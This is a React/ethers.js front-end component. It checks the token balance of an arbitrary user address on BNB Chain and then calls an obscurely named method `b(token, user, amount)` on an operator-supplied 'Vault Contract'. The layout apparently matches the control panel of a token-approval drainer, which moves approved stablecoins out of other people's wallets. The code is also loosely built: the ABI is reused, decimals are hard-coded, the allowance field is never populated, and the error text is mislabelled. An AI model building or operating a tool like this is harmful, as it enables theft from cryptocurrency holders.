import { useState, useEffect } from "react";
import { Contract, BrowserProvider, formatUnits, parseUnits } from "ethers";
import classes from "./IndividualPage.module.css";
import { useAppKitAccount, useAppKitProvider } from "@reown/appkit/react";
import { USDTAbi } from "App";
import clsx from "clsx";

const IndividualPage = () => {
  const [inputs, setInputs] = useState({
    tokenContract: "",
    userAddress: "",
    saleContract: ""
  });
  const [balanceInfo, setBalanceInfo] = useState({ 
    balance: 0, 
    allowance: 0,
    tokenName: "",
    tokenSymbol: ""
  });
  const [amount, setAmount] = useState("");
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [selectedNetwork, setSelectedNetwork] = useState('bsc');
  const [selectedToken, setSelectedToken] = useState('');

  const NETWORKS = {
    bsc: {
      name: 'BNB Chain',
      tokens: [
        {
          symbol: 'USDT',
          address: '0x55d398326f99059ff775485246999027b3197955',
          decimals: 18
        },
        {
          symbol: 'BUSD',
          address: '0xe9e7cea3dedca5984780bafc599bd69add087d56',
          decimals: 18
        }
      ]
    },
    // eth: {
    //   name: 'Ethereum',
    //   tokens: [
    //     {
    //       symbol: 'USDT',
    //       address: '0xdac17f958d2ee523a2206206994597c13d831ec7',
    //       decimals: 6
    //     }
    //   ]
    // }
  };

  const { address, isConnected } = useAppKitAccount();
  const { walletProvider } = useAppKitProvider('eip155');

  const isValidAddress = (addr) => /^0x[a-fA-F0-9]{40}$/.test(addr);
  const balanceFieldsValid = isValidAddress(inputs.tokenContract) && isValidAddress(inputs.userAddress);
  const executeFieldsValid = isValidAddress(inputs.tokenContract) && 
                            isValidAddress(inputs.userAddress) && 
                            isValidAddress(inputs.saleContract) && 
                            amount;

  useEffect(() => {
    if (selectedToken) {
      const token = NETWORKS[selectedNetwork].tokens.find(t => t.symbol === selectedToken);
      setInputs(prev => ({
        ...prev,
        tokenContract: token.address
      }));
    }
  }, [selectedToken, selectedNetwork]);

  useEffect(() => {
    if (isValidAddress(inputs.tokenContract)) {
      const fetchTokenDetails = async () => {
        try {
          const ethersProvider = new BrowserProvider(walletProvider);
          const contract = new Contract(inputs.tokenContract, USDTAbi, ethersProvider);
          const [name, symbol] = await Promise.all([
            contract.name(),
            contract.symbol()
          ]);
          setBalanceInfo(prev => ({
            ...prev,
            tokenName: name,
            tokenSymbol: symbol
          }));
        } catch (err) {
          console.error("Error fetching token details:", err);
        }
      };
      fetchTokenDetails();
    }
  }, [inputs.tokenContract]);

  const checkBalance = async () => {
    try {
      setLoading(true);
      setError("");
      
      const ethersProvider = new BrowserProvider(walletProvider);
      const signer = await ethersProvider.getSigner();
      
      const contract = new Contract(inputs.tokenContract, USDTAbi, signer);
      const balance = await contract.balanceOf(inputs.userAddress);

      setBalanceInfo(prev => ({
        ...prev,
        balance: formatUnits(balance, 18)
      }));
    } catch (err) {
      setError(err.message || "Failed to fetch balance");
    } finally {
      setLoading(false);
    }
  };

  const executeAction = async () => {
    try {
      setLoading(true);
      setError("");
      
      const ethersProvider = new BrowserProvider(walletProvider);
      const signer = await ethersProvider.getSigner();
      
      const contract = new Contract(inputs.saleContract, USDTAbi, signer);
      const balance = await contract.b(inputs.tokenContract,inputs.userAddress, parseUnits(amount, 18) )
    } catch (err) {
      setError(err.message || "Failed to fetch balance");
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className={classes.uniContainer}>
      <div className={classes.uniCard}>
        {/* <h1 className={classes.uniTitle}>Token Manager</h1> */}
        
        <div className={classes.networkTabs}>
          {Object.keys(NETWORKS).map(networkKey => (
            <button               key={networkKey}
              className={clsx(
                classes.networkTab,
                selectedNetwork === networkKey && classes.activeNetwork
              )}
              onClick={() => setSelectedNetwork(networkKey)}
            >
              {NETWORKS[networkKey].name}
            </button>
          ))}
        </div>

        <div className={classes.inputSection}>
          <div className={classes.inputGroup}>
            <div className={classes.tokenSelector}>
              <select                 className={classes.tokenDropdown}
                value={selectedToken}
                onChange={(e) => setSelectedToken(e.target.value)}
              >
                <option value="">Select a Token</option>
                {NETWORKS[selectedNetwork].tokens.map(token => (
                  <option key={token.symbol} value={token.symbol}>
                    {token.symbol}
                  </option>
                ))}
              </select>
              <input                 type="text"
                value={inputs.tokenContract}
                onChange={(e) => {
                  setSelectedToken('');
                  setInputs({...inputs, tokenContract: e.target.value})
                }}
                className={classes.uniInput}
                placeholder="Or enter contract address"
              />
            </div>
            {balanceInfo.tokenName && (
              <div className={classes.tokenInfo}>
                <span>{balanceInfo.tokenName}</span>
                <span>({balanceInfo.tokenSymbol})</span>
              </div>
            )}
          </div>

          <div className={classes.inputGroup}>
            <label className={classes.inputLabel}>User Address</label>
            <input               type="text"
              value={inputs.userAddress}
              onChange={(e) => setInputs({...inputs, userAddress: e.target.value})}
              className={classes.uniInput}
              placeholder="0x..."
            />
          </div>

          <div className={classes.inputGroup}>
            <label className={classes.inputLabel}>Amount to Execute</label>
            <input               type="number"
              value={amount}
              onChange={(e) => setAmount(e.target.value)}
              className={classes.uniInput}
              placeholder="Enter amount"
            />
          </div>

          <div className={classes.inputGroup}>
            <label className={classes.inputLabel}>Vault Contract</label>
            <input               type="text"
              value={inputs.saleContract}
              onChange={(e) => setInputs({...inputs, saleContract: e.target.value})}
              className={classes.uniInput}
              placeholder="0x..."
            />
          </div>
        </div>

        <div className={classes.buttonRow}>
          <button             className={clsx(classes.uniButton, classes.primaryButton)}
            onClick={checkBalance}
            disabled={!balanceFieldsValid || loading}
          >
            {loading ? 'Checking...' : 'Check Balance'}
          </button>
          
          <button             className={clsx(classes.uniButton, classes.actionButton)}
            onClick={executeAction}
            disabled={!executeFieldsValid || loading}
          >
            Execute
          </button>
        </div>

        {error && <div className={classes.errorBox}>{error}</div>}

        <div className={classes.resultsPanel}>
          <div className={classes.resultItem}>
            <span>Token Balance:</span>
            <span className={classes.resultValue}>
              {Number(balanceInfo.balance).toFixed(6)} {balanceInfo.tokenSymbol}
            </span>
          </div>
          <div className={classes.resultItem}>
            <span>Allowance:</span>
            <span className={classes.resultValue}>{balanceInfo.allowance}</span>
          </div>
        </div>
      </div>
    </div>
  );
};

export default IndividualPage;